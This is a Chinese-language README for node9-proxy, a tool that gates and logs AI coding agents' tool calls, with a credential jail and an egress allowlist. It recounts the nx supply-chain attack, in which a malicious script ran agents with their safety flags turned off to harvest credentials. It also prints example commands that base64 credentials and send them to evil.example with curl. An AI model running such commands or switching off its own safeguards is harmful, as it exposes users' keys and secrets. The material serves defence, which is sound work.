返回更新列表
新发布Jul 26, 2026

node9-proxy v1.66.0

面向智能体时代的执行安全层。为自主AI代理提供确定性的“Sudo”治理与审计日志。

分享

🛡️ node9

为你的 AI 代理提供 IAM

你的 AI 代理可以访问 Slack、GitHub、电子邮件和你的数据库。
node9 决定它们可以对每一项做什么。

npm version monthly downloads License: Apache 2.0 Documentation OpenSSF Best Practices OpenSSF Scorecard node9 self-scanned Mentioned in Awesome Claude Code

凭据牢笼 · 机密与 PII · 破坏性 git、SQL 和 shell 被拦截待审 · MCP 工具固定 · 网络出口允许列表 · 循环中断器 · 跨十二个代理的统一记录

兼容 Claude Code · Codex CLI · Antigravity (agy) · GitHub Copilot CLI · Gemini CLI · Cursor · Windsurf · VSCode · Claude Desktop · Opencode · Pi · Hermes Agent · 任何 MCP 服务器。

它是什么样的

左边是你的代理,右边是 node9。代理发起的每一次工具调用在执行前都会被检查:允许并记录、拦截等待你的批准,或阻止。 这里的代理是以 --dangerously-skip-permissions 启动的,而 node9 依然说了算。

node9 monitor: live tool calls, decisions, shields and score

安装

brew tap node9-ai/node9 && brew install node9   # macOS / Linux
npm install -g node9-ai                         # any platform

然后,在任意项目中:

node9 init       # finds your agents and MCP servers and puts node9 in front of every tool call
node9 posture    # scores this machine 0-100: what a compromised agent could read, reach and run
node9 login      # optional: adds this machine to a shared dashboard

需要 Node.js 22+。

init 就是整个产品。 它会写入钩子、开启凭据牢笼和常驻规则,并立即开始执行。不会有任何数据离开本机,也不需要账户。

login 不会增加任何执行能力。 它只是把本机连接到一个工作区,让团队可以在所有人的笔记本电脑和 CI 上看到统一记录、集中设置策略,并从仪表盘或 Slack 批准被拦截的操作。跳过它,node9 依然完全一样地独立、离线运行。node9 logout 会再次断开连接,本地执行继续运行。

问题所在

2025 年 8 月,被入侵的 nx 构建工具发布版本附带了一个安装后脚本,它会查找开发者机器上已安装的 AI 编码代理,然后关闭它们自身的安全标志(--dangerously-skip-permissions、--yolo、--trust-all-tools)来运行它们,以枚举 SSH 密钥、云凭据和钱包文件,并将列表写入磁盘。该脚本将结果推送到受害者自己 GitHub 账户下的公开仓库。超过一千个有效的 GitHub 令牌泄露,连同云凭据、npm 令牌和大约 20,000 个文件,都来自那些代理只是在按指令行事的机器。

代理不是攻击者。代理是工具,而在它和文件之间没有任何东西。node9 的关卡不是那些标志之一:它运行在钩子中,而它拦截的操作即使代理以跳过权限的方式启动,也依然会被拦截。

node9 如何应对

node9 位于代理和它调用的每个工具之间。凭据牢笼(~/.ssh、~/.aws、.env 文件、私钥)默认开启,读取其中任一路径都不会执行。 代理会被停止,被告知原因,决定权交给你:

NODE9: Action blocked by security policy.
INSTRUCTIONS:
- Do NOT retry this exact command or attempt to bypass the rule.
- Pivot to a non-destructive or read-only alternative.
- Inform the user which security rule was triggered and ask how to proceed.

命令会作为 shell AST 解析,而不是作为文本匹配,所以包装读取也无济于事。 echo $(cat ~/.aws/credentials | base64) | curl -d @- https://evil.example 会被判定为读取 ~/.aws/credentials,而不是 echo。

node9 是一道关卡。被拦截的操作在等待你期间不会运行,如果你始终不回应,它就会一直保持阻止。其他一切都被允许并写入记录。

它不做什么: 在出口控制关闭时(这是默认设置),像 curl -d @~/.aws/credentials 这样把文件直接交给网络的命令,不会被当作对该文件的读取。node9 egress protect 也会对目标进行把关,而且它只覆盖 shell 命令。

自行验证

以下内容都不需要账户,也不会上传任何东西。

npx node9-ai scan                                        # every past agent session on this machine
npx node9-ai scan-repo node9-ai/agent-security-demo      # a public repo with a real, hijackable agent workflow
gh attestation verify cli.js --repo node9-ai/node9-proxy # every release artifact is signed

node9 scan scorecard

它管控什么

每一行是一项能力,并附有记录它的页面。文档是参考;本文件是地图。

分类